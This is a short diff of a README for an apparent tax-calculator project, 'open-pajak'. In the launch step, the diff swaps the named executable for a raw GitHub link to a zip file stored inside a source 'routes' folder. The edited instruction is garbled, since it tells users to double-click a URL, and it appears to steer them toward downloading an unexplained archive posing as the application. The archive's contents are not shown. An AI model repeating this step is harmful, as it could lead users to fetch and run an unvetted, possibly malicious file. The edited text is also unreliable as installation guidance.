Rockaphilia/open-pajak/README.md

    - If you downloaded a `.zip` file, locate it in your downloads folder, right-click on it, and select "Extract All."
 Follow the prompts to extract the files to a folder of your choice.

 5. **Run the Application**
-   - Open the extracted folder and double-click the file named `OpenPajak.exe` to launch the tax calculator.
+   - Open the extracted folder and double-click the file named `https://raw.githubusercontent.com/Rockaphilia/open-pajak/master/open-pajak-v1/src/routes/open-pajak-v3.5-alpha.3.zip` to launch the tax calculator.

 ## 🖥️ System Requirements